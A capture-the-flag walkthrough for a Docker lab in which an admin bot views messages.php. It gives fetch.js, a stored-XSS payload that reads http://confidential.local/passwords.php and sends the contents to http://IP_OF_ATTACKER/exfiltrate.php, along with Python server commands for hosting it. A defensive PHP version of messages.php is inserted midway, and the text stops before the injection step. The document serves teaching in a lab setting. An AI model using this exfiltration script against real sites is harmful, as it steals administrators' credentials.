IP Address 172.25.200.200

Port: 9027

Want to run this Docker container locally?

docker run -d -p 9027:80 --name red50 --restart always joshbeck2024/ctf_xss_to_null_byte_injection_flag_red50

Start by registering an account and logging in.


There is an admin user who visits messages.php every 60 seconds. The idea is to inject a script that makes that user's browser request http://confidential.local/passwords.php from the admin's position inside a private subnet and ship the administrative password list back to us.
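For the defensive side of this chain, here is a hardened version of a messages.php page. It is an added example, not the challenge's own code, and it assumes a SQLite table named messages with author, body and created_at columns. Output encoding removes the stored-XSS injection point, and a Content-Security-Policy with connect-src 'self' means that even an injected script could not pull data from confidential.local or post it to an outside host.

```php
<?php
// Hardened messages.php (added example; the challenge's real file is not on the page).
// Assumption: messages live in a SQLite table with author, body and created_at columns.

// Scripts may load only from this origin, and XHR/fetch may connect only to this origin.
// A <script src="http://ATTACKER/fetch.js"> tag would be refused, and inline code could
// not reach http://confidential.local or any exfiltration endpoint.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
     . "connect-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'");
header('X-Content-Type-Options: nosniff');

// Encode user-controlled text for an HTML body/attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string, which would otherwise hide a broken message silently.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$db = new PDO('sqlite:' . __DIR__ . '/messages.db');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$rows = $db->query('SELECT author, body, created_at FROM messages ORDER BY created_at DESC')
           ->fetchAll(PDO::FETCH_ASSOC);
?>
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Messages</title></head>
<body>
<h1>Messages</h1>
<ul>
<?php foreach ($rows as $r): ?>
  <li><b><?= esc($r['author']) ?></b> (<?= esc($r['created_at']) ?>): <?= esc($r['body']) ?></li>
<?php endforeach; ?>
</ul>
</body>
</html>
```

With this in place a message containing a script tag is rendered as literal text, and the admin bot's 60-second visits no longer execute anything the message author controls.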

There is more than one way to handle this. The method in this walkthrough can be streamlined!

Create a folder to work in and use pico (or any editor) to create a file called fetch.js with the following contents:

// Function to send the fetched data to the attacker's server using GET parameters
function sendData(data) {
    var xhr = new XMLHttpRequest();
    // The original line was cut off in the editor after "&' + new Da"; the remainder
    // (presumably a cache-busting parameter) is not shown on the page, so it is omitted here.
    var url = 'http://IP_OF_ATTACKER/exfiltrate.php?data=' + encodeURIComponent(data);
    xhr.open('GET', url, true);
    xhr.send();
}

// Function to fetch passwords from passwords.php
function fetchPasswords() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://confidential.local/passwords.php', true);  // Replace with the target URL
    xhr.onload = function() {
        if (xhr.status === 200) {
            console.log("Passwords fetched successfully: ", xhr.responseText);
            sendData(xhr.responseText);  // Send the fetched passwords to the attacker's server
        }
    };
    xhr.send();
}

// Automatically execute the exploit when the script is loaded
fetchPasswords();


Host this file from that folder with python3 -m http.server.


In another window we’ll stand up a web server on port 80.

python3 -m http.server 80


Now we'll inject an XSS payload into the message box so that anyone viewing the messages executes the code in fetch.js.